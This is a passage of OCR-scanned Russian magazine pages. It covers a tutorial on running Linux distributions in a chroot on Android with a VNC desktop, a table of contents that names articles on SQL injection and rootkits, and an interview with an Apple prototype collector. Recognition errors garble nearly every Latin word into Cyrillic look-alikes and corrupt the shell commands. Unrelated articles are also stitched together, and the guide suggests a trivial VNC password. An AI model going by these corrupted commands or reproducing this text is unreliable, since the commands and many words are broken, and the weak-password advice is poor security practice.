новить его с помощью АРМ-эмулятора на виртуальный жесткий 
диск (то есть в файл), скинуть этот файл на 50-карту устройства, 
открыть терминал, смонтировать образ в качестве ІоорЬаск- 
устройства и сделать сИгооІ внутрь. Все! Это так же просто, как 
запуск РТР-сервера в сИгооЫокружении — простой и проверенный 
десятилетиями метод. 

Единственный камень преткновения, когда ты решаешь за- 
пустить дистрибутив Ыпих внутри АпсІгоісІ, — графическая среда. 
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АпсІгоісІѴМС — подключаемся к рабочему столу 





ВаскТгаск, запущенный на планшете 



В то время как с доступом к консоли никаких трудностей не воз- 
никает благодаря наличию полноценного эмулятора терминала, с 
графическими приложениями начинаются проблемы — нативного 
Х-сервера для АпсІгоісІ нет, а запустить обычный Х-сервер внутри 
самого дистрибутива невозможно из-за коренных отличий в 
архитектуре графической подсистемы зеленого робота. Несмотря 
на то что в основе она использует стандартный Ыпих РгатеЬиКег, 
поверх которого можно запустить Х-сервер, эксклюзивное право 
его использования изначально принадлежит более высокоуровне- 
вым библиотекам АпсІгоісІ, поэтому остается либо загружать Ыпих- 
дистрибутив вместо АпсІгоісІ (что совершенно непрактично), либо 
придумывать обходные пути. 

Энтузиасты вышли из этой ситуации, используя простой метод 
«удаленного» подключения к рабочему столу с помощью любого 
доступного для АпсІгоісІ ѴІ\ІС-клиента. Внутри сЬгооЫокружения 
запускается Х-сервер Хѵпс, и все приложения работают под его 
управлением. Пользователю остается лишь установить ѴІМС- 
клиент, вбить локальный адрес — и вуаля, на экране появляется 
полноценный рабочий стол. 

Единственное узкое место при использовании удаленного 
рабочего стола — это производительность. Даже работая локаль- 
но, ѴІМС не может обеспечить должный ее уровень, которого бы 
хватило для плавной прокрутки или перемещения окон без лагов. 
Решить эту проблему пока не удалось, проекты разработки натив- 
ного Х-сервера, который бы использовал графическую подсистему 
АпсІгоісІ, еще очень сыры и не могут быть использованы для запу- 
ска полноценных графических сред. Впрочем, никто не запрещает 
их использовать; к примеру, X Зегѵег от Оагкзісіе ТесЬпоІодіез Ріу 
Ыб ( доо.дІ/арЗиР ) вполне сгодится для запуска простого софта. 

Изначально Ыпих для АпсІгоісІ существовал только в виде обра- 
за с уже установленной системой, а также пояснительной инструк- 
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цией как этот образ подключить и использовать. Затем появились 
скрипты, которые автоматизировали процесс подключения образа 
и запуска Ыпих, но и они требовали некоторой работы головой. 
Наконец, в последнее время появились инсталляторы, доступные 
в боодіе РІау (например, доо.дІ/Р5А1] ). в некоторой степени авто- 
матизирующие процесс запуска дистрибутива, хотя, по сути, это 
все то же руководство по установке, но интерактивное, с прямыми 
ссылками на скачивание образов и скриптов. 

АЛЬТЕРНАТИВНЫЕ ВАРИАНТЫ 

Выше я уже упомянул о том, что дистрибутив Ыпих вполне может 
быть загружен вместо Апбгоіб, благодаря чему удастся задейство- 
вать РгатеЬіШег для прямого доступа к видеоадаптеру и суще- 
ственно ускорить работу графического интерфейса. Однако делать 
это на смартфоне практически бессмысленно — Ыпих непригоден 
в качестве основной системы на небольших экранах, к тому же 
принимать звонки и пользоваться интернетом будет невозможно. 

А вот на планшете Ыпих будет выглядеть вполне достойно. 

Обычно на устройство, изначально работающее под управлени- 
ем Апбгоіб, так называемая нативная версия І_іпих-дистрибутива 
устанавливается следующим образом. На внутреннем МАИй- 
накопителе планшета создается дополнительный раздел, на 
который копируется Ыпих-дистрибутив. Затем загрузчик ІІ-ВооІ (он 
применяется в большинстве планшетов) настраивается таким об- 
разом, чтобы использовать этот раздел в качестве загрузочного. 

В результате планшет будет автоматически загружать І_іпих- 
систему после включения питания. 

Чтобы оставить возможность загрузки Апбгоіб, загрузчик 
ІІ-ВооІ перенастраиваюттаким образом, чтобы раздел с І_іпих- 
системой был не основным, а выполнял функцию «раздела для 
восстановления» (Ресоѵегу Мобе), доступного с помощью включе- 
ния устройства с зажатой клавишей громкости (тот самый, который 
используется для перепрошивки устройства и выполнения раз- 
личных восстановительных операций). Таким образом удается 
получить устройство с двойной загрузкой: Апбгоіб по умолчанию 
и дистрибутив Ыпих при загрузке в режиме восстановления. Сам 
Ресоѵегу Мобе при этом остается доступным только с помощью 
специальных инструментов. 

В случае если ЫАМО-памяти оказывается недостаточно для 
размещения полноценной Ыпих-системы, ее части (обычно раздел 
/іізг) выносят в образ или раздел на 50-карте. Кстати, ех*2-раздел 
на карте памяти также можно использовать для установки Ыпих, 
запускаемой в сЬгооЫокружении. 

Установить нативный Ыпих-дистрибутив сложнее, чем рабо- 
тающий в сЬгооЫокружении, но это стоиттого, если у тебя есть 
планшет и ОТС-кабель, с помощью которого можно подключить 
клавиатуру и мышь. 

ПРАКТИЧЕСКОЕ ЗАНЯТИЕ 

Как я уже говорил, для запуска под управлением Апбгоіб при- 
годны только дистрибутивы, портированные на архитектуру АРМ. 
Прежде всего это ІІЬипІи и ОеЫап, причем первый по понятным 
причинам пользуется гораздо большим интересом среди робото- 
водов. Также можно установить бепіоо и несколько специализи- 
рованных дистрибутивов, например Васкігаск. Рассмотрим самый 
типичный случай, то есть установку ІІЬипІи по стандартной схеме, 
без использования каких-либо автоматизированных инсталлято- 
ров и прочего. 

Для начала нам нужен образ жесткого диска с установленным 
дистрибутивом. Его можно создать самому, воспользовавшись 
эмулятором (ЭЕМІІ, однако в связи с тем, что процедура установки 
абсолютно стандартна и типична, описывать ее я не буду, а про- 
сто направлю тебя по адресу доо.д!/9пѵВі . Здесь лежит архив с 
образом, на который предустановлен ІІЬипІи 12.04 с графическим 
окружением І_ХОЕ (было бы неразумно запускать ІІпіІу/бІЧОМЕ на 
телефоне/планшете). Архив следует распаковать и положить файл 
иЬипІи.ітд на карту памяти. 




ІІЬипІи на баіаху ТаЬ 10.1 
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Запуск ІІЬипІи с помощью стартового скрипта 
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Проект «1Л)ип1и *ог Апсігоііі» в действии 

Далее надо смонтировать образ и сделать сЬгооІ в окружение 
дистрибутива. Для этого нужны права гооі, прошивка с поддерж- 
кой блочных ІоорЬаск-устройств и установленный ЬизуЬох (ищем 
в Маркете по запросу «ЬизуЬох іпзіаііег», в СуаподепМоЬ есть по 
умолчанию). Последовательность действий: 

1. Открываем эмулятортерминала в Апсігоісі (если нет, можно 
установить из Маркета ТегтіпаІ Етиіаіог). Либо подключаем 
смартфон/планшет к компу и получаем доступ к терм и налу с по- 
мощьюаЬЬ: 

$ ссі путь-до-АпсІпоісІ-50К/р1а1:-Рогт-1:ооІ5 
$ зисІо^/асІЬ зЬеІІ 

Не забываем, что режим отладки в этом случае должен быть 
включен: «Настройки — > Для разработчиков — » Отладка 
Апсігоісі». 

2. Получаем права гооі: 

$ 511 

3. Создаем блочное ІоорЬаск-устройство, подключаем к нему об- 
раз диска и монтируем его: 

# шкпосі /с!еѵ/Ыос к/1оор255 Ь 7 255 

# тоипі: -о гетоштС., гѵі_/ 

# тксііг /тп'С/иЬипТіи 

# тоипі: -о Іоор, поаіііте -1: ех1:2 \ 

/зс!сагсІ/иЬип1:и . іт% /тпІі/иЬипІіи 

Содержимое образа должно появиться в каталоге /зскагсі/ 
иЬипІи. Проверь, чтобы это было так. 

4. Подключаем все необходимые для работы дистрибутива вирту- 
альныеФС: 

# тоипі: -1: рпос рпос /тпІі/иЬипІіи/рпос 

# тоипі: -1: зузТз зузТз /тп1:/иЬип1:и/5у5 

# тоипі: -о ЬіпсІ /сіеѵ /тп1:/иЬип1:и/сІеѵ 

5. Настраиваем так, чтобы из сЬгооІ-окружения можно было по- 
лучить полноценный доступ в Сеть: 

# зузс1:1 -ѵі пе1:.ірѵ4.ір_-РопыапсІ=1 

# есііо «патезегѵег 8. 8. 8. 8» > /тпТ/иЬип-Ьи/е-Ьс/гезоІѵ.сопТ 

# есМо «патезегѵег 8. 8. 4. 4» » /тп1:/иЬип1:и/е1:с/ 
гезоІѵ.сопТ 

# есИо «127.0.0.1 ІосаІИоБ-Ь» > /тп1:/иЬип1:и/е1:с/Ьо5І:5 



6. Переходим в сЬгооІ-окружение: 

# сіігооі: /тгѵЬ/иЬигѵЬи 

Собственно, на этом установка заканчивается. Теперь можно 
запускать консольный софт, производить обновление системы, 
стартовать сетевые сервисы и делать почти все, что можно сделать 
с обычной десктопной Ыпих-системой, не забывая, конечно, что 
некоторый софт, напрямую взаимодействующий с железом и раз- 
личными специализированными псевдодевайсами, работать не 
будет. Также не забываем, что виртуальные ФС после завершения 
работы следует размонтировать. 

Теперь нам необходимо установить и запустить Х-сервер Хѵпс, 
экспортирующий дисплей и устройства ввода с использованием 
протокола ѴІ\ІС. ТідЫѴІМСзегѵег уже есть в представленном об- 
разе и даже настроен, но, чтобы ты лучше понял процесс и смог 
решить возникшие проблемы, я подробно опишу процесс его 
установки и запуска. 

1. Обновляемся и устанавливаем ТідМѴМСзегѵег: 

# ар1:-§е1: ирбаТе 

# ар1:-%е1: іп5І:а11 1:і§1і1:ѵпс5епѵеп 

2. Создаем файл /гооі/.ѵпс/хзіагіир и пишем в него следующее: 

#! /Ьіп/біі 

хгсІЬ $НОМЕ/ .ХгезоигсеБ 
хзе1:гоо1: -зо іісі ^геу 
ехрогі: ХКІ_ХМОРМАР_РІ5АВІ_Е=1 
ісеыт & 

Іхзеззіоп 



Третья команда здесь нужна, чтобы пофиксить проблемы, 
которые могут возникнуть из-за физического отсутствия на 
устройстве клавиатуры. 

3. Запускаем Хѵпс с помощью враппера ѵпсзегѵег с правами гооі: 

# ехрогі: ІІ5ЕК=гоо1: 

# ѵпсзегѵеп -§еоте1:гу 1024x800 

В результате выполнения последней команды на экран будет 
выведен запрос на пароль для доступа к ѴІ\ІС-серверу, лучше 
указать что-нибудь простое вроде «123». Разрешение можно 
установить фактически любое, однако лучше, если оно будет 
совпадать с физическим разрешением экрана устройства. 

4. Устанавливаем на смартфон приложение АпсІгоісіѴМС, запу- 
скаем его, указываем ІР-адрес и порт5901, подключаемся. На 
экране должен появиться рабочий стол 1_Х0Е. 

Чтобы не заморачиваться с ручным вводом всех команд, 
можно использовать скрипт иЬипІи.зЬ, расположенный здесь: 
доо.дІ/х5рК4 . Просто положи его и образ ибипіи.ітд в каталог 
ибипіи на 50-карте и запусти скрипт командой зЬ иЬипІи.зЬ, 
а через 5-10 секунд подключись к рабочему столу с помощью 
АпсІгоісіѴМС. Имей в виду, что скрипт монтирует образ к каталогу 
/баіа/іосаі/тпі. 



УСТАНОВКА 6ЕІМТ00 НА ЕХТ2-РАЗДЕЛ 

Итак, мы установили ІІЬипІи с помощью образа с файловой си- 
стемой и шаманств с ІоорЬаск-устройством и сбгооі-окружением. 
Сделать это оказалось несложно, а с применением скриптов так 
и вообще очень легко, но что, если пойти дальше и установить 
более хардкорный дистрибутив, и не с использованием образов, 
а на выделенный ех12-раздел на карте памяти? Так мы сможем 
решить проблему некоторых прошивок и ядер без поддержки 
ІоорЬаск-устройств и к тому же сможем насладиться нормальным 
дистрибутивом, установленным по всем правилам. 
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Возьмем в качестве подопытной системы Сепіоо. Чтобы уста- 
новить его на ех*2-раздел, нам понадобится карта памяти объемом 
не меньше 2 Гб и рутованный смартфон с установленным ЬизуЬох. 
Последовательность действий такова: 

1. Делаем бэкап данныхс карты памяти и создаем на ней дополни- 
тельный раздел, объемом не меньше двух гигабайт. Сделать это 
можно с помощью любой программы для разбивки дисков, однако 
имей в виду, что если ты хочешь продолжать использовать 50- 
карту по прямому назначению, то создавать РАТ32-раздел следу- 
ете начале карты, так, чтобы он стал первым, а дополнительный 
раздел для установки дистрибутива должен быть вторым. 

2. Форматируем разделы 50-карты: 

$ зисіо ш к-Рз.ѵ-РаІ: /сіеѵ/всісі 
$ зисіо т к-р5.ех1=2 /сІеѵ/5СІс2 

3. Беремтелефон,заходимв«Настройки^0телефоне»исмотрим, 
какой установлен процессор. Далее переходим на страницу досъ 
ді/РЩих и выкачиваем зІадеЗ для нужной архитектуры, например 
зІадеЗдля АРМ ѵ7 л ежит в каталоге сиггепІ-5ІадеЗ-агтѵ7а. 

4. Монтируем ех12-раздел карты памяти на компе и распаковыва- 
ем в негосодержимое полученногоархива: 

$ зисіо тоипі: /сІеѵ/5СІс2 /тпі: 

$ зисіо 1:ап -ххр-р зТадеЗ-* . Ьг2 -С /тпі: 

Сразу редактируем конфиги и все, что нужно, по вкусу, включая 
правку /еіс/гезоіѵ.сопі" по образцу из предыдущего раздела. 

5. Запускаемэмулятортерминала (или выполняем «асІЬзІіеІІ»), 
монтируем все необходимое и переходим в сіігооі (почти также, 
каквслучаесІІЬипІи): 

# тоипі: -о гетоипТ., гм / 

# тксііг /тп1:/§еп1:оо 

# тоипі: /с!еѵ/Ыоск/ттсЫкѲр2 /тп1:/§еп1:оо 

# тоипі: -1: ргос ргос /тп1:/иЬип1:и/ргос 

# тоипі: -Т: зуз-Рз зуз-Рз /тп1:/иЬип1:и/5у5 

# тоипі: -о ЬіпсІ /сіеѵ /тп1:/иЬи п1:и/сІеѵ 

# зузсСІ -м пеТ . ірѵ4. ір Тонл/агс1=1 

# сіігооі: /тп1:/§еп1:оо 

Доступ к рабочему столу производится таким же способом, как 
в ІІЬипІи, за исключением того, что теперь прямо на телефоне при- 
дется собрать кучу софта :). Впрочем, можно настроить среду для 
кросс-компиляции на компе, но это уже тема для отдельной статьи. 

НАТИВНАЯ УСТАНОВКА 

Запустив ІІЬипІи с использованием ѴІЧС-сервера, ты заметишь 
неторопливость его работы, которая связана с издержками про- 
токола ѴІЧС на передачу картинки «по сети». Чтобы избежать этой 




Нативный Х-сѳрвѳр для АпсІгоісІ 



проблемы, можно установить ІІЬипІи в качестве основной системы 
рядом с АпсІгоісІ, так, чтобы она смогла использовать видеоадап- 
тер напрямую. К сожалению, универсального способа сделать это 
не существует. Каждое устройство по-своему уникально, включая 
различные таблицы разделов І\ІАІ\Ю-памяти, на которую произво- 
дится установка, различные устройства и драйверы для их работы. 

К счастью, процесс установки нативной версии дистрибутива 
хорошо описан для многих устройств в русскоязычных форумах, 
поэтому найти инструкцию будет несложно. Стоит, тем не менее, сразу 
обратить внимание на несколько особенностей такого типа установки: 

• Отдельный или основной І\ІАІ\Ю-раздел. Ыпих-дистрибутив может 
бытьустановлен как взаблаговременно созданный раздел в 
І\ІАІ\Ю-памяти,таки в основной загрузочный раздел. В первом 
случае разработчик прошивки обычно оставляет возможность 
загрузки АпсІгоісІ с помощью специального скрипта л ибо через за- 
грузку Ыпих-дистрибутива в режиме восстановления, во втором он 
будетустановлен ^вместо* АпсІгоісІ и для возвращения возможно- 
сти загрузки робота придется заново перепрошивать устройство. 

• Возможность двойной загрузки. Если Ыпих-дистрибутив будет 
установлен на отдельный раздел, разработчик можетоставить 
возможность за грузки АпсІгоісІ. Однако стоит сразу обратить вни- 
мание, какэтазагрузка происходит: с помощью режима восста- 
новления л ибо скрипта, за пускаемого с обычного компа. Все-таки 
второй способ будет неудобен в дороге. 

• Поддержка оборудования. Оригинальное Ыпих-ядро АпсІгоісІ- 
прошивкиуже включает в себя все необходимые драй веры, кото- 
рые могутпонадобиться для работы полноценной І_іпих-системы, 
однако далеко не во всех Ыпих-прошивках все заведется само 
собой. Часто возникают проблемы с ѴѴі-Рі-адаптером и сенсорным 
экраном, который неадекватно реагирует на прикосновения. По- 
этому перед установкой прошивки стоит внимательно прочитать 
информацию о возможных осложнен иях. 

В любом случае будь готов к тому, что во время установки Ыпих- 
дистрибутива все твои данные будут уничтожены. Без этого никак. 

ЧТО ДАЛЬШЕ 

Ыпих-дистрибутив, установленный рядом с оригинальной АпбгоісІ- 
системой, может стать очень удобным рабочим инструментом, однако 
на данный момент «Ыпих внутри АпсІгоісІ» считается скорее игрушкой 
и способом покрасоваться перед друзьями, нежели серьезным 
решением. Уверен, что в скором времени, когда для АпсІгоісІ появится 
полноценная реализация графического сервера ѴѴауІапсІ, ситуация 
начнет меняться и мы увидим дистрибутивы с адаптированным для 
небольших экранов интерфейсом, а также полноценные Ыпих- 
приложения, распространяемые в форме обычных АРК-пакетов. Так- 
же не стоит забывать о проекте «ІІЬипІи і"ог АпсІгоісІ» — в его рамках 
идет работа над официальным портом ІІЬипІи для АпсІгоісІ, который 
позволит использовать смартфон в качестве переносного системни- 
ка, подключаемого к любому монитору. НЕ 



ПРОВЕРКА РАБОТЫ 
НЕОБХОДИМЫХ МОДУЛЕЙ 



І'М'.'І 

• аоо.аІ/ЦбРеЗ — 

описание процесса 
подготовки 
образа ІІЬипІи 
собственными 
силами (на 
английском). 



Имей в виду, что поддержка ІоорЬаск-устройств 
и файловых систем ех*2/ех*3, необходимых 
для подключения образа, имеется далеко 
не во всех ядрах Ыпих, установленных 
на смартфонах под управлением АпсІгоісІ. 
Проверить наличие поддержки можно с 
помощью команды Ізтосі I дгер -е Іоор -е ех*2. 
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ПРОТОТИПЫ ОТ АРРЬЕ 

Игровая консоль, компьютерсо встроен- 
нымфаксом, платежныйтерминал — что 
общегоуэтихпредметов? Правильно, всё 
это — продукты Арріе, которые так никог- 
да и не попали на рынок. ][ пообщался с 
коллекционером, специализирующимся 
на прототипах«яблочной»техники, и 
подготовил для тебя рассказ о самых 
интересных экспонатах. Как показывает 
история, можетнастать момент, когда 
Арріе решит вернуться к одной из своих 
идей, — так уже получилось с планшета- 
ми иТВ-приставками. Однако, прочитав 
этот репортаж, ты уже не будешь удив- 
ляться, если в Купертино вдругрешат 
заново изобрести, скажем, факс. Всё это 
уже где-то было. 
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ЖИЗНЬ В КОНСОЛИ ѴШ00ѴѴ5 




ЗНАКОМЬСЯ. ЭТО МАККООѴ\М 
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СтсІ.ехе — это не диагноз, с этим вполне 


48 


Метаязыкверстки на всеслучаижизни 
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можно и нужно бороться. Как именно, ты 




позвол иттебе писать статьи, вести блог 





узнаешь из обзора различных надстроек и создавать целые сайты с помощью 

длястандартной консоли ѴѴіпсІоѵѵз. простоготекстового редактора. 



САГА О КРИПТОСТОЙКИХ ПАРОЛЯХ 

Статья отом, какзащититьхеши 
паролеей отбанальногобрутфорса на 
дешевой видеокарте и не наступать на 
теже грабли, что и ЫпкесІІп. 



ВЗЛОМ 



МАШАКЕ 




66 



$СИ-ИНЪЕКЦИИ ЧЕРЕЗ 0№ 

Автор зцітар рассказывает отом, как 
спомощьюегодетища и выделенного 
сервера можно производить слепые 
инъекции за намного меньшее время. 



82 



РЕ5ТІ:ЗЛ0БНЫЙ И БЕСТЕЛЕСНЫЙ 

Рассматриваем под микроскопом 
руткит Рез1:і, известный инструмент 
для проведения спам-рассылоки 
ООоВ-атак. 



88 



ПОЙМАЙ МЕНЯ, ЕСЛИ СМОЖЕШЬ 

О писание технологи и, способной 
сокрытьфайлы руткита отсигнатурных 
проверок анти вирусов в условиях 
ѴѴіпсІоѵѵз 7 и выше. 
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Евгений «Ріпкегаіог» Колпаков (З.ІДпкегаІогйдтаіІ.сот) 







1976-1998 



1998-2000 




2001-2007 




2007-Н.В. 



ОКАЗЫВАЕТСЯ, В ЯБЛОЧНОЙ КОМПАНИИ 
РАЗРАБОТАЛИ НЕ ТОЛЬКО ІРНОЫЕ, ІМАС И ІРАО! 



Арріе стремительно овладе- 
вает умами пользователей. 

И ладно бы пользователей — 
даже в нашем журнале, оплоте 
хардкора и цитадели здраво- 
мыслия, почти все пересели 
на айфоны, а у нашего Зіер'а 
так и вовсе в наличии имеется 
МасВоок! Наверное, и утебя 
что-то такое есть, поэтому мы 
подготовили тебе не обзор 
нового айфона и его много- 
численных убийц, а кое-что 
покруче: список прототипов от 
компании Арріе! 



Большая часть из представленных прототипов 
хранятся в частной коллекции Джима Эбелса 
(Лт АЬеІез]. Мы связались с ним и попросили 
рассказать о его коллекции. 

ПЕ: Здравствуйте, Джим! 

Расскажите о себе — где живете, где работае- 
те, чем занимаетесь? 

«I. А.: Я живу в Портленде, штат Орегон, где 
управляю компанией Ргеі БоКѵѵаге, которую 
основал в конце 90-х. 

Ш-Е: Когда вы начали коллекционировать про- 
тотипы от Арріе? Каким был самый первый 
экспонат в коллекции? 

«I. А.: Мой первый МасіпІозЬ был подарком 
родителей к окончанию колледжа. Это был 
МасіпІозЬ 5Е с двумя флоппи-дисководами, 
но без внутреннего жесткого диска. Было бы 
здорово сохранить его — тогда моя коллекция 
могла начаться еще в 1987 году. К сожалению, 
тот компьютер я давно продал. 



Примерно в 2001 году мне снова захотелось 
увидеть на столе МасіпІозИ 5Е и я купил один 
из них просто для развлечения. Затем я приоб- 
рел МасіпІозЬ РІиз, и в какой-то моментлюди 
просто начали приносить мне свои старые 
Мас-компьютеры. Прошло некоторое время, 
и я понял, что хочу чего-то большего — по- 
лучить действительно необычные продукты 
от Арріе в свою коллекцию. 

Для начала я нашел раритетный вари- 
ант ВеІІ & НоѵѵеІІ Арріе II, который в народе 
прозвали ОагіЬ Ѵабег [ доо.д І/ТУхдѵ ). Затем 
в коллекцию добавилась Арріе Ыза 1 сдвумя 
дисководами под 5,25", и дело стало набирать 
обороты. 

В какой-то момент я столкнулся с самыми 
редкими моделями — прототипами. Как прави- 
ло, это были серьезно ограниченные выпуски 
устройств, число которых могло быть меньше 
десятка во всем мире. При этом часть про- 
тотипов по разным причинам не доживала до 
официального выпуска в продажу. 
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Прототипы от Арріе 




На момент написания статьи, Лт АЬеІез работал в своей 
фирме, которую ІЗлет назад основал. Дна момент сдачиее 
в печать он... ушел из фирмы и теперь работает офицером 
полиции 

ПЕ: Вы коллекционируете только продукцию 
Арріе или другие фирмы тоже интересны? 

А.: Какое-то время я коллекционировал и 
неяблочные прототипы, а также необычные 
компьютеры вроде ІМ5АІ 8080 и АІІаіг 8080, 
но меня они не сильно привлекали. Плюс от 
всей этой техники дома стало тесновато. На- 
громождение старых компьютеров, принтеров 
и периферии становилось пугающим. Теперь 
в моей коллекции только прототипы от Арріе 
и относящихся к ее истории компаний вроде 
ІЧеХТ (которую Джобс основал после ухода из 
Арріе) или Ве Іпсогрогаіесі (компания бывшего 
исполнительного директора Арріе Сотриіегз 
Жана-Луи Гассье, создатели Ве05). 

НЕ: Что у вас есть интересного в коллекции? 
Расскажите про самые значимые экспонаты. 

X А.: Для меня самые ценные прототи- 
пы устройств — те, что так и не поступи- 
ли в продажу. Концепты вроде ѴѴ.А.І..Т. 

(ѴѴІ 22 у Асііѵе ЫЫуІе ТаЫеІ — как раз такой 
весной продали за 8000 долларов на еВау), Віс 
ІМеѵѵІоп и СасШІас ІМеѵѵІоп. Самое интересное, 
что все это — мобильные устройства. Вот по- 
чему я люблю их сильнее других — именно эти 
прототипы были прадедушками знаменитых 
іРЬопе и іРасІ. 

НЕ: В чем отличия от финальных версий — 
просто в цвете корпуса или вы замечали что- 
то интересное внутри? 

.І.А.: Самые необычные — это прототипы с про- 
зрачными корпусами. Они позволяли инжене- 
рам видеть, как компоненты нового устройства 
сочетаются внутри корпуса. Какие места силь- 
нее греются, а где пробежала искра — все это 
могло повлиять на финальную форму корпуса и 
расположение деталей на печатных платах. 

Также в своих прототипах Арріе использо- 
вала разноцветные печатные платы, а многие 
элементы внутри были подписаны вручную. 
Надпись «прототип» или предупредительная 
табличка, что устройство не было одобрено РСС 
(Федеральная комиссия по связи) и не предна- 
значено для продажи, — это обычное дело. 
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И-Е: Все ли они работают, или часть прототипов 
не включается? 

«I. А.: Печально, но некоторые из самых 
раритетных экземпляров даже не включают- 
ся. Быть может, именно поэтому их хозяева 
решили избавиться от ненужного железа и 
подарить их мне. 

Другие, к счастью, работают, и в них хорошо 
заметно прикосновение руки программистов 
и инженеров Арріе. Некоторые из прототи- 
пов іРЬопе'ов, іРасГов и іРосГов содержат 
программное обеспечение, которое не было 
рассчитано на публичный показ. В нем хорошо 
прослеживается индивидуальность и даже 
чувство юмора создателей. 

ПЕ: Какой из прототипов был самым дорогим, 
сколько вы обычно платите за них и где по- 
купаете — через еВау? Быть может, какой-то 
из прототипов вам просто подарили? 

3, А.: Некоторые экземпляры стоят очень до- 
рого — цены доходят до тысяч долларов! Но 
мне частенько везет. Есть множество бывших 
сотрудников Арріе, которые продают мне про- 
тотипы за смешные деньги. Для них важна не 
прибыль — они просто хотят, чтобы устрой- 
ства попали в руки к коллекционеру, который 
может о них позаботиться. Чтобы частички 
истории Арріе не ушли в небытие. Один из 
самых ценных прототипов — Арріе Раіасііп мне 
бесплатно отдал бывший инженер из Арріе. 

Вообще, если говорить об источниках, 
часть коллекции я купил на еВау, часть на 
Сгаідвіізі, что-то удалось отыскать среди 
Арріе-комьюнити. 

ПЕ: Расскажите про прототип игровой при- 
ставки Рірріп от Арріе. Удалось ли вам во 
что-нибудь на нем поиграть? 

«I. А.: Да, я включал Рірріп и даже играл на нем! 
Прошло уже пять лет с того момента, и сейчас я 
даже не вспомню его технические характери- 
стики. Если честно, понятно, почему эта при- 
ставка провалилась. Она была дико устаревшей 
уже на момент выхода и совершенно непривле- 
кательной по сравнению с конкурентами. Она 
выглядела просто ужасно и тормозила! 



потрогать все эти прототипы. Сейчас у меня 
больше ста устройств в коллекции, и дома про- 
сто нет подходящей комнаты, чтобы сделать 
выставочный зал. Большинство из них просто 
лежат в коробках, и это совсем не похоже 
на музейные условия. В Калифорнии уже 
есть компьютерный музей, и я надеюсь, что 
в какой-то момент откроюттакой же музей в 
Портленде, — я бы с удовольствием выставлял 
в нем свою коллекцию. 

ПЕ: Перед смертью Стив Джобс не успел 
закончить работу над телевизором нового 
поколения. Как вы думаете — что полу- 
чится из этой идеи и как будет выглядеть 
новый продукт? Интеграция с І05, запуск игр 
на большом экране или что-то большее? 

3. А.: Ха! Хотел бы я знать. Мне кажется, это 
будет светодиодный телевизор с Ю5 и управ- 
лением через 5ігі. Арріе уже доминирует на 
рынке музыки и сотовых телефонов, но пока не 
добралась до рынка телевизоров и домашних 
развлечений. Я надеюсь, она добьется успеха, 
а я получу в коллекцию парочку новых про- 
тотипов, выскользнувших на волю из яблочных 
лабораторий. 

И-Е: Что из актуальных продуктов Арріе (не 
прототипов) вы используете? Или, может 
быть, даже пользуетесь чем-то из своей кол- 
лекции прототипов? 

3, А.: Единственный прототип, которым я 
пользуюсь, — это РоѵѵегМас 04 Тоѵѵег. Ис- 
пользую его как домашний сервер для музыки 
и фильмов. В остальном я стараюсь покупать 
последние новинки от Арріе: 17" МасВоок Рго 
для дома и работы, пара Арріе ТѴ, іРЬопе 45 
и ІРасІ 2. 

Фотографии публикуются с разрешения 
.Лт АЬеІез, Ргеі ЗоЙѵѵаге. 

Часть фотографий публикуется с разреше- 
ния Вшсе йатег, ОідіВагп Сотриіег Мизеііт 

( сІідіЬагп.сот/соІІесІіопв/іпсІех.ЬітІ ). 

Автор фотографий прототипа ІРасІ — 
пользователь аарз69 с еВау. 



ПЕ: Есть ли какой-то прототип, который вам 
хочется найти, или коллекцию на данный 
момент можно считать завершенной? 

3, А.: Я бы хотел найти МасіпІозЬ 5Е в прозрач- 
ном корпусе. Как и другие подобные прототи- 
пы, компьютер должен существовать примерно 
в десяти экземплярах. Этот экземпляр особен- 
но важен для меня — именно эта модель была 
моим первым Арріе-компьютером. Здесь в 
Орегоне хранится один такой — у бывшего ин- 
женера из Арріе, но он просит 5000 долларов, а 
я сейчас не могу себе позволить такие траты. 



ПЕ: Не думаете ли вы о возможности открыть 
музей Арріе в будущем? 

«I. А.: Когда-нибудь я надеюсь открыть свой 
музей, где люди смогут посмотреть и даже 
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Арріе СасЯіІІас 



Прототип в прозрачном корпусе. Это сейчас Арріе занимает лидирующие позиции 
в секторе мобильных устройств, а ведь когда-то она только начинала экспериментиро- 
вать в этой области. Прототип датирован 1992 годом — в это время Джобс не работал 
в Арріе и разработка устройств шла без его участия. Именно поэтому можно заметить 
на корпусе СасІіІІас прорезь для стилуса — Джобс их на дух не переносил. Да и съемные 
аккумуляторы на мобильных устройствах при нем сложно вспомнить. 






Арріе Ыеѵѵіоп Віс 

Еще один шаг на пути к созданию іРасІ — 
1994 год. Все еще со стилусом, все еще 
со сменными источниками питания. 
Вместо 5тагІ Соѵег — кожаный чехол. 



Арріе Іпіегасііѵе 
ТеІеѵІБІоп 

Прототип этой приставки для просмотра ТВ 
достаточно массово тестировали в США и 
Европе в 1994 — 1995 годах. В итоге его быстро 
свернули, и сейчас многие продаютсвои про- 
тотипы через еВау. Устройство получило раз- 
витие только в 2007 году и в настоящее время 
продается под названием Арріе ТѴ. 



Арріе ѴѴ.А.І..Т. 
(ѴѴіггу Асііѵе 
Ніезіуіе 
ТеІерНопе) 

Очередной эксперимент среди 
электронных устройств. Арріе впервые 
продемонстрировала его на МасѵѵогІсІ 
Вобіоп в 1993 году, но так никогда 
и не выпустила в продажу. По идее, 
его нужно было подключать к теле- 
фонной линии и использовать в роли 
«умного» телефона. Опять же под- 
разумевалось управление при помощи 




ХАКЕР 09/164/2012 





Прототипы от Арріе 
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Арріе РоѵѵегВоок 5300 

На корпусе можно заметить пометки «прототип», а сам 
ноутбук в тот момент назывался «РоѵѵегВоок ХХХХ». 



Прототип первого іРаб, который внезапно 
всплыл весной этого года на еВау. Устройство 
поставлялось без аккумулятора, да и внешний 
вид слегка отличался от финального варианта. 
Главная особенность — у планшета было сразу 
два порта для зарядки — один, классический, 
снизу и еще один сбоку. Логика такого реше- 
ния довольно простая — устройство можно за- 
ряжать и в горизонтальном и в вертикальном 
положении так, чтобы провод не мешал рукам. 

Вместо знакомой Ю5 мы видим на экране 
тестовую прошивку для проверки всех функ- 
ций устройства. 

Прототип нашел своего нового владельца 
за 10 200 долларов. 




Арріе Раіасііп 

Прототип офисной мечты. В нем собрали прак- 
тически все — телефон, факс, копир и даже 
компьютер. Внешняя клавиатура с трекболом - 
в комплекте. 



Міко 



Міко — это совместная разработка Арріе и Кіпд. Ее название — сокращение от 
МасІпзісІеКіпдОіЛзісІе. Изображенное на картинке устройство — это прототип термина- 
ла вроде платежных Оіѵѵі, которые сейчас стоят практически в каждом магазине. 

Наличие тачскрина, полноценная операционная система Мае 05 и необычная веб- 
